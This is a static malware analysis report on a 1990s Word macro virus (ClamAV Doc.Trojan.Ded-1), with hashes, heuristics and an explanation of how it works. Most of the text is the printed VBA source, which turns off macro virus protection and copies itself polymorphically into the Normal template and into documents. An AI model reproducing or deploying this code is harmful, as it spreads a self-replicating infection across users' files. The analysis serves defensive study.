Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab2b5319c419e5db…

MALICIOUS

Office (OLE)

34.5 KB Created: 2000-08-22 20:38:00 Authoring application: Microsoft Word 8.0 (Word 97) First seen: 2012-06-14
MD5: 35f287c899baaaf391d2f155741f802c SHA-1: 3cbc595d6462dd9b8ef16aae614f20dbf9ae24be SHA-256: ab2b5319c419e5db2610cc4b906051fd50617e55f84f36d27010edfdab2d436c
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Word document whose VBA macros run from the `Document_Close` handler: they set `Options.VirusProtection = False`, hide the Visual Basic Editor, and copy the macro source between the active document and the Normal template whenever the other side does not yet contain a `Document_Close` routine — the classic self-replicating Word 97 macro-virus pattern, which persists through the Normal template (ATT&CK Office Template Macros, T1137.001; the T1547.001 Registry Run Keys / Startup Folder tag is not supported by the excerpt shown below). Each copied line is passed through the macro's own `e()` routine, which randomly re-wraps lines with ` _` continuations, pads them with spaces, appends random numeric comments and swaps the `Vc()`/`ViewVBCode()` names, so every copy has a different layout (polymorphism). The `Shell()` call flagged by the heuristics does not appear in the portion of the preview shown below (the preview is truncated); together with the ClamAV signature 'Doc.Trojan.Ded-1' it still supports the malicious verdict, but downloading of additional malware is not evidenced by the visible code.

Heuristics 3

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21373 bytes
SHA-256: 6345aea0e326ff847428dd8059c49b8017771134a47a8dd8b4c8e092a7e3a859
Detection
ClamAV: Doc.Trojan.Ded-1
Obfuscation or payload: unlikely (tool verdict — note that the extracted source is nonetheless polymorphic: the macro's own `e()` routine randomly inserts ` _` line continuations, leading spaces and numeric `'nn.nnnnn` comments into every copy it writes, which is why the listing below looks the way it does)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
     Private Sub _
Document_New()

        End Sub
'9.637774
          Private _
Sub Document_Close()

           On _
Error GoTo skam

  Options. _
              VirusProtection = False

          SWL
'33.61163
     ABS99
'42.56033
skam:
'8.957314
           End Sub
'72.16117
      Private Sub SWL()
'42.59714
     Application. _
                          ShowVisualBasicEditor = False

              If Not _
ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

        For _
I = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines

    d = NormalTemplate. _
VBProject.VBComponents(1).CodeModule.Lines(I, 1)

 If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

            While Mid(d, _
Len(d) - 1, 2) = " _"

      I _
= I + 1

        d = Left(d, Len(d) _
- 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

              Wend
'95.43525
              d = _
e(d)

            ActiveDocument. _
                            VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

    End If
'90.69127
           Next I
'36.27004
       ActiveDocument. _
                                     SaveAs AddToRecentFiles:=False

   End If
'87.02004
End Sub
'90.91909
              Private Sub _
ABS99()

     If Not NormalTemplate. _
 VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

 f (NormalTemplate. _
            FullName)

   For I = _
1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

              d = ActiveDocument.VBProject. _
VBComponents(1).CodeModule.Lines(I, 1)

        If Len(d) _
> 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

 While _
Mid(d, Len(d) - 1, 2) = " _"

            I = _
I + 1

        d = Left(d, _
Len(d) - 1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

       Wend
'95.04152
        d _
= e(d)

  NormalTemplate.VBProject. _
   VBComponents(1).CodeModule.InsertLines I * 2, d

             End If
'29.928
            Next I
'63.33987
 NormalTemplate. _
   Save

         End If
'4.384488
         End Sub
'4.367179
 Private Function _
e(aString) As String

           aString _
= LTrim(aString)

          aString = RTrim(aString)
'62.57433
 If aString = "Sub " & "Vc()" Then
'53.55306
             aString _
= "Sub " & "ViewVBCode()"

       Else
'98.58498
            If aString = "Sub " & "ViewVBCode()" Then
'60.07596
            aString _
= "Sub " & "Vc()"

 End If
'61.56798
   End _
If

       For _
I = 1 To Len(aString) - 1

         If _
Mid(aString, I, 1) = "." Then

              If Not _
Mid(aString, I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

      If Not Mid(aString, I + 1, 1) _
= Chr$(34) Then

    e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)

 For _
j = 1 To Int(15 * Rnd)

   e = " " & e
'57.74265
       Next j
'78.44582
Exit _
Function

             End If
'30.3376
            End If
'26.83433
              Else
'31.48093
 If Mid(aString, I, _
1) = " " And Int(3 * Rnd) = 1 And I > 1 Then

If _
Not Mid(aString, I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then

            e = Left(aString, I - 1) & " _" & _
Chr$(13) & Right(aString, Len(aString) - I)

       For _
j = 1 To Int(15 * Rnd)

             e = " " & e
'10.19003
       Next j
'56.59349
  Exit _
Function

              End _
If

     End _
If

          End _
If

   Next I
'45.99786
       e = _
aString & Chr$(13) & "'" & (100 * Rnd)

    Count
... (truncated)